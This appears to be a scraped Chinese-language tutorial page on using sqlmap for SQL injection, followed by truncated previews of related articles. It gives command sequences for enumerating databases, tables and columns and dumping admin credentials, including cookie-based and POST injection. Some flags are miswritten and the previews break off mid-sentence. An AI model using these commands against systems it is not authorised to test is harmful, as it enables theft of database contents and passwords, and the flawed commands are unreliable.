第一種:普通的注入方式
第一步:首先進行 -u操作,比如:-u ""
第二步:進行-d暴庫操作 sqlmap -u "" --dbs
第三步:進行-t暴表操作 sqlmap -u
"" -d user --tables
第四步:進行--colums進行暴欄位 sqlmap -u
"" -d user -t use --colums
第五步:進行--dump暴欄位內容-
sqlmap -u
"" -d user -t use -c admin --dump
第二種:通過使用cooki進行注入
sqlmap 「 –cookie 「id=1″ –dbs –level 2
第三種:post注入
幾種注入方式
1:./sqlmap.py -r search-test.txt -p tfupass //通過工具抓乙個表單post的包然後將包儲存為txt文字的形式-r 指定文字,-p指定引數
2:sqlmap -u -forms //sqlmap會自己去在網頁找到表單並進行注入
3:sql -u -data "tfuname=1&tfupass=1"//-data指定引數註解 //-u指定鏈結
SQLmap注入教程
一次sqlmap注入點並且dump出賬號密碼全程 判斷注入點 sqlmap.py u 存在注入url 爆出所有資料庫名字 sqlmap.py u 存在注入url dbs 檢視當前使用賬號 sqlmap.py u 存在注入url current user 1 檢視當前資料庫 sqlmap.py u 存...
注入神器 sqlmap
01 注入原理 存在注入的原因是因為後台在編寫程式時,沒有對使用者輸入的資料做過濾導致的,正如事實上,不是所有的使用者都是友好的 比如 使用者在某個輸入框提交的引數是 2 瀏覽器提交的url為 http www.com index.php?id 2 伺服器後台執行sql語句 select from ...
Sqlmap注入基礎命令
1.檢測當前url是否是存在sql注入漏洞 sqlmap.py u url 2.檢測當前使用的資料庫 sqlmap.py u url current db 3.檢視所有的資料庫 sqlmap.py u url dbs 4.查詢 資料庫下的所有表 sqlmap.py u url d 庫名 tables...